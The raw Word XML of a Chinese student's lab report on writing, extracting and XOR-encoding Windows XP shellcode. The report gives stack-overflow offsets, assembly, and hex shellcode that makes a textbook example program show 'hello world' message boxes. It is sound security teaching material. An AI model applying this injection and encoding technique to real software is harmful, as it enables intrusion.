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许健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 xml:space="preserve">学号： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2013018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  <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellcode编写及编码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复现第五章实验三，并将产生的编码后的shellcode在示例5-4中进行验证，阐述shellcode编码的原理、shellcode提取的思想。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spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>一：基于示例5-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>向其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>植入一段代码，弹出Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Box窗体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>。Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> XP环境下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>C6进行实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/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根据栈帧的结构，至少要向reg.txt中写入buffer+flag+前ebp=52个字节，所以53-56才是要淹没的返回地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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调用Windows的MessageBox函数需要三个步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>装载动态链接库user32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>已装载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在汇编语言中调用这个函数需要获得这个函数的入口地址。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200"/>
        <w:jc w:val="both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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们可以采用代码获取相关函数地址。GetProcaddress函数检索指定的动态链接库中的输出函数地址，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果函数调用成功，返回值是DLL中的输出函数地址。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200"/>
        <w:jc w:val="both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运行程序可以得到MessageA的地址为0x77d507ea。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Wingdings"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>indows xp下静态API的地址是准的，windows XP之后的操作系统版本增加了ASLR保护机制，地址就不准，就得动态获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4994275" cy="321945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0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00" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在调用前需要向栈中按从右向左的顺序压入MessageBoxA的4个参数。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2432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888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机器代码（十六进制）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465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汇编指令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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33 DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465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XOR  EBX,EBX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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将EBX的值设置为0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465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PUSH  EBX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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将EBX的值入栈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888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68 77 65 73 74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465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PUSH  74736577</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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将字符串west入栈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68 77 65 73 74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465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PUSH  74736577</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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将字符串west入栈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spacing w:line="30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8B C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465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MOV  EAX,ESP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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将栈顶指针存入EAX（栈顶指针的值就是字符串的首地址）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465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PUSH   EBX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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入栈Messagebox的4个参数-类型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465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PUSH   EAX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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入栈Messagebox的4个参数-标题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465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PUSH   EAX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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入栈Messagebox的4个参数-消息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465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PUSH   EBX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312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入栈Messagebox的4个参数-句柄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B8 EA 07 D5 77</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465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MOV EAX, 0x77D507EA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:vMerge w:val="restart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调用MessageBoxA函数，注意，每个机器的该函数的入口地址不同，请按实际值写入。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8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FF D0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa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CALL EAX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto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</w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 汇编代码和指令所对应的机器代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="2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得到的shellcode为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>33 DB 53 68 77 65 73 74 68 77 65 73 74 8B C4 53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50 50 53 B8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>EA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07 D5 77 FF D0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minor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VC转到反汇编查看buffer的地址值为0x0012faf0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="65468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UltraEdit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shellcode: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29480" cy="2491105"/>
            <wp:effectExtent l="0" t="0" r="10160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运行结果截图，可以看到窗口显示westwest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2786380"/>
            <wp:effectExtent l="0" t="0" r="254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 w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>实验二：在实验一基础上，自己编写调用Messagebox输出“hello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>”的Shellcode，并进行利用测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="422" w:firstLineChars="20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1．用c语言书写要执行的shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="422" w:firstLineChars="20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2．换成对应的汇编代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="20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对于获得的汇编代码需要进行再加工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72405" cy="1351915"/>
            <wp:effectExtent l="0" t="0" r="63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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="422" w:firstLineChars="200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3．根据汇编代码，找到对应地址中的机器码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="1812925"/>
            <wp:effectExtent l="0" t="0" r="1397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</w:rPr>
        <w:t xml:space="preserve">在Memory窗口就可以找到对应的机器码：33 DB 53 53 53 53 B8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EA 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> D5 77 FF D0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>。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/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>接下来就可以利用这个Shellcode来实现漏洞的利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以此类推，输出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>Hello World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</w:rPr>
        <w:t>编写的shellcode代码如下：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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr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>#include &lt;stdio.h&gt;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>#include &lt;windows.h&gt;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>void main()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>{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">LoadLibrary("user32.dll");//加载user32.dll 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>_asm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>{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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>xor ebx,ebx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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>push ebx//push 0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C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>push 20646C72h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C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>push 6F77206Fh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C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>push 6C6C6568h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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>mov eax, esp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ab/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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>push ebx//push 0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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>push eax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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>push eax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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>push ebx</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">    mov eax, 77d507eah// 77d507eah这个是MessageBox函数在系统中的地址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ab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>call eax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>}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>return;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid w:val="0"/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Wingdings"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>提取到的shellcode代码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Wingdings"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Wingdings"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>\x33\xDB\x53\x68\x72\x6C\x64\x20\x68\x6F\x20\x77\x6F\x68\x68\x65\x6C\x6C\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\xD5\x77\xFF\xD0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体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运行窗口显示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3994150" cy="2115820"/>
            <wp:effectExtent l="0" t="0" r="13970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b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>实验三：在实验二基础上，对shellcode进行编码后再进行利用。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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对于shellcode，可以采用异或编码的方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>当exploit成功时，shellcode顶端的解码程序首先运行，它会在内存中将真正的shellcode还原成原来的样子，然后执行。这种对shellcode编码的方法和软件加壳的原理非常类似。这样，我们只需要专注于几条解码指令，使其符合限制条件就行，相对于直接关注于整段shellcode来说使问题简化了很多。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="408"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minor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编码程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
